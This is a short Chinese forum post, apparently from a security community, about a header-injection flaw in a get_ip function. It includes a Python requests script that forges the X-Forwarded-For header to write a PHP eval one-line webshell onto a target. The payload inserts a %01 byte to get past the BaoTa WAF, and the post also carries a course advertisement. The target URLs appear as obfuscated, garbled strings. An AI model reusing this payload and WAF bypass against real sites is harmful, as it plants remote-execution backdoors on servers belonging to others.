get_ip这个函数的问题,伪造了HTTP_X_FORWARDED_FOR头4acK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3k6Q4x3X3b7H3x3e0R3%4i4K6u0W2K9s2y4K6P5h3u0H3i4K6u0W2j5$3&6Q4x3V1k6#2k6i4N6I4k6i4N6I4j5g2)9J5k6i4m8Z5M7l9`.`.
写入其他php都行,就是写入一句话不行会被拦截,开了宝塔waf
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
# coding: utf-8 import urllib import requests php = '<?php extract($_REQUEST);@eval%01($x);?>' header={ 'x-forwarded-for' : urllib.parse.unquote(php) } print(requests.get('39fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3k6Q4x3X3b7H3x3e0R3%4i4K6u0W2K9s2y4K6P5h3u0H3i4K6u0W2j5$3&6Q4x3V1k6#2k6i4N6I4k6i4N6I4j5g2)9J5k6i4m8Z5M7q4)9J5y4W2)9J5x3K6x3&6i4K6y4n7i4K6u0o6i4K6t1$3L8X3u0K6M7q4)9K6b7X3S2W2j5h3c8W2M7Y4y4Q4x3@1c8Z5k6h3q4V1k6i4u0Q4x3U0W2Q4x3X3g2@1k6i4S2@1i4K6t1&6